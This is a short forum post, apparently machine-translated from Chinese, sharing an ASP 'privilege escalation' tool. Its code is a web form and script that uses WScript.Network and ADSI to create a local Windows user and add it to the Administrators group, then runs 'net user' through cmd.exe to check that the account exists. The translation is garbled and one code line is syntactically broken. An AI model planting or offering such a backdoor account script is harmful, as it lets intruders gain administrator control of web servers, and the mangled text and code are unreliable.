Author link
Hey, when I was reading a book in the restroom recently, I was directed to an article titled "adding superuser asp code".
I heard that wscript. shell can be used to escalate permissions. The advantage is that the success rate is low.
Code:
<Head>. network object script Privilege Escalation Vulnerability exploitation tool <Form action = "useradd. asp" method = post>
User: <input name = "username" type = "text" value = "kevin1986"> <br>
Password: <input name = "passwd" type = "password"> <br>
<Input type = "submit" Value = "">
</Form>
<% @ Codepage = 936%>
<% On error resume next
If request. servervariables ("REMOTE_ADDR") <> "127.0.0.1" then
Response. write "iP! S n0T RiGHt"
Else
If request ("username") <> "" then
Username = request ("username ")
Passwd = request ("passwd ")
Response. Expires = 0
Session. TimeOut = 50
Server. ScriptTimeout = 3000
Set lp = Server. CreateObject ("WSCRIPT. NETWORK ")
Oz = "WinNT: //" & lp. ComputerName
Set ob = GetObject (oz)
Set oe = GetObject (oz & "/Administrators, group ")
Set od = ob. Create ("user", username)
Od. SetPassword passwd
Od. SetInfo
Oe. Add oz & "/" & username
If err then
Response. write "~~ Do not buy 6 + 1 today ...... Save 2 yuan to buy a bottle of cola ...... "
Else
If instr (server. createobject ("Wscript. shell" cmd.exe c ("cmd.exe/c net user" & username. stdout. readall), "Last login")> 0 then
Response. write "although there is no error, it seems that it has not been established successfully. You must be very depressed"
Else
Response. write "OMG! "& Username &" is an account! This is an unknown vulnerability. 5,000,000 RMB is yours"
End if
End if
Else
Response. write "Enter the user name"
End if
End if
%>